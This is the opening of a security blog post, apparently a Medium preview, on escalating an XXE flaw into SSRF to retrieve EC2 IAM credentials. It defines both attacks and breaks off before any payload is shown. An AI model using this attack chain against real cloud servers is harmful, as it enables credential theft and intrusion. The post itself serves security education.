Exploiting XXE for SSRF

Gupta Bless
4 min readOct 10, 2020

Retrieving IAM credentials of EC2 instance using xxe and ssrf

Server-Side Request Forgery (SSRF):- SSRF is an attack in which an attacker can force a vulnerable server to trigger malicious requests to third-party servers and or to internal resources.

For more on SSRF and its exploitation check my previous blog:

https://medium.com/bugbountywriteup/exploiting-ssrf-for-admin-access-31c30457cc44

XML External Entity (XXE): An XML External Entity attack is a type of attack against an application that parses XML input. It often allows an attacker to view files on the application server file system, to interact with any backend or external systems that the application itself can access and it can be escalated to RCE as well.

For more on XXE check my previous blog:

https://medium.com/@gupta.bless/exploitation-xml-external-entity-xxe-1f5f3e7bc5c4

How to escalate XXE vulnerability to perform SSRF execution?

Exploiting this helps an attacker to access local infrastructure or internal network bypassing the WAF which can lead to sensitive information disclosure.

In order to utilize SSRF through the escalation of the XXE, the XML entity must be identified by the URL that we want to target and use the value of the…

--

--